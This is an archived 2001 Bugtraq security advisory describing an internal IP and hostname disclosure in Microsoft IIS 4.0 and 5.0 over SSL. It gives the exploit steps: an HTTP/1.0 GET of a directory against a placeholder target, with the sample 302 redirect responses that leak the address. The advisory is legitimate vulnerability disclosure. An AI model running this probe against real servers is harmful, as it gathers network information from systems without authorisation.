Bugtraq mailing list archives
Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
From: Marek Roy <marek_roy () hotmail com>
Date: 8 Aug 2001 04:54:55 -0000
GGS-AU / e-Synergies Security Advisory August 8, 2001 Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0 Synopsis: e-Synergies has discovered and researched remote vulnerability in Internet Information Server from Microsoft. Successful exploitation of this vulnerability can reveal critical internal information such as Internal IP Address or Internal host name. Affected Versions: Microsoft IIS 4.0 running SSL Microsoft IIS 5.0 running SSL Description: By connecting manually to port TCP/443 (SSL) using Perl(SSLeay) or any other tools, a remote user has the ability to retrieve Internal IP address or reveal the machine's network node hostname. Exploit: 1- Browse the web site using a normal SSL browser and find any directory. I.E.: https://www.target.com/images/icon.gif 2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of www.target.com: GET /images HTTP/1.0 3- The result should look like this: HTTP/1.1 302 Object Moved Location: https://192.168.1.10/images/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: xxx or HTTP/1.1 302 Object Moved Location: https://netbiosname/images/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: xxx Remarks: Using HTTP/1.1 instead of HTTP/1.0 will not give the same result. Credits: Marek Roy Senior IT Security Consultant Please send suggestions, updates, and comments to: GGS-AU / e-synergies, Sydney, Australia Level 9 65 York Street Sydney NSW 2001 Australia Phone: +61 2 9279 2533 Fax: +61 2 9279 2544 Email: enquiries () ggs-au com http://www.ggs-au.com
Current thread:
- Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0 Marek Roy (Aug 08)
- <Possible follow-ups>
- RE: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0 Marc Maiffret (Aug 09)
- Re: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0 H D Moore (Aug 10)
- RE: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0 Microsoft Security Response Center (Aug 09)